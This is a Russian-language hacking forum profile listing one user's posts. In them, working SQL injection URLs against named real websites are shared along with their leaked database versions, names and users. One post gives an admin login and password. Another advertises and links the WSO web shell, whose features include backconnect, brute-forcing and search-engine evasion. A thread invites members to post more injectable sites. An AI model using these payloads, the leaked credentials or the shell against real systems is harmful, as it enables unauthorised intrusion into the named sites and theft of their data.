Lomik

Пользователь
  • Публикаций

    5
  • Зарегистрирован

  • Посещение

Информация о Lomik

  • Звание
    Пользователь

Гарант

  • Сделок через гарант
    3
  1. ozerside какой линукс посоветуеш что комфортно начать прееходить с винды а линукс
  2. протаскивал 2 через московскую таможню в аэропорту даже слова не сказали
  3. ozerside, ну ты жжош как всегда . ай да сносить винду ставь линукс будь мужыком
  4. Lomik

    WSO Web Shell

    чесно я у себя нашел если знаеш скин ьв пм напишу знаю чт офоруум пойму грабберз или с ачата
  5. Код: http://bpsca.co.uk/p...concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12--Version:5.1.56-community-log Database:web231-website-1 User:[email protected] Код: http://newportrestau...concat(version(),0x3a,database(),0x3a,user()),5,6,7--Version:5.0.51a Database:newporth_NHCSync User:[email protected] Код: http://newagestudios...concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- Version:5.0.45-community-nt Database:newagestudios User:[email protected] Код: http://naturalpaving...t 1,2,(version(),0x3a,database(),0x3a,user()),4,5,6,7,8--Version:5.0.77-log Database:naturalpdb User:[email protected] Ковыряйте глядиш че нужного вам найдете Код: http://krushmore.com...concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--Version:5.0.92-community Database:caribbe_main User:[email protected] Код: http://intelligentfo...concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8--Version:5.0.51a-community-nt Database:ifdb User:[email protected] Логин и пасс админа admin:kissme
  6. Lomik

    WSO Web Shell

    Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами. Описание возможностей / особенности: * Авторизация на cookies * Информация о сервере * Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок) * Просмотр, hexview, редактирование, скачивание, загрузка файлов * Работа с zip архивами (упаковка, распаковка) + сжатие в tar.gz * Консоль * SQL менеджер (MySql, PostgreSql) * Выполнение PHP кода * Работа со строками + поиск хеша в онлайн базах * Биндпорт и бек-коннект (Perl) * Bruteforce FTP, MySQL, PgSQL * Поиск файлов, поиск текста в файлах * Поддержка *nix-like и Windows систем * Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка) * Можно использовать AJAX * Небольшой размер. Упакованная версия занимает 22.8 Kb * Выбор кодировки, в которой работает шелл. Чейнджлог: 2.5 * Вместо сессий теперь используется cookies * Исправлен поиск по exploit-db.com * Убран раздел Safe-mode * Шелл корректно работает при disabled_functions = scandir * Теперь можно искать не только текст в файлах, но и просто файлы по маске * Переработан mysql dump * Изменен список сервисов в "Search for hash" * Убраны изображения из phpinfo() * "Мелкая косметика" * Исправление других мелких багов 2.4 * добавлена переменная в конфиг, отвечающая за включение/выключения ипользования AJAX по умолчанию * улучшен раздел Sql * новый формат дампа (более компактный) * возможность сохранять дамп в файл (если имя файла не указано, то дамп предлагается сразу скачать) * gui получше, навигация по таблице теперь удобней * добавлена возможность включить/отключить подсчет количества записей в таблицах * Load file выводиться, если у пользователя хватает привилегий * при неудачном коннекте к бд выводиться ошибку * добавлена возможность смотреть ошибки в Console (перенаправление stderr в stdout) * в Sec. Info добавлен вывод модулей Apache'а * теперь в файловом менеджере при наведении на ссылки (я про ссылки в фс) всплывает подсказка куда ведет ссылка * можно упаковывать в tar.gz, если доступно выполнение команд. * можно указывать названия для архивов * ссылка на поиск сплойта под ядро теперь ведет на exploit-db.com * попытался выделить место куда в Console вбивать команды более заметно) * фиксы багов http://www.sendspace.com/file/ng6k4q © oRb
  7. Выкладываем в этой теме найденые SQL иньекции. Раскручиваем скулю до версии мускуля бд и юзера. Можно сразу на вывод определенной инфы. Пример: Код: http://www.anonym.to...concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- Version:5.0.77 Database:interplay user:[email protected] Иньекции такого вида не нужны будут удаляться. http://site.com/news.php?id=4'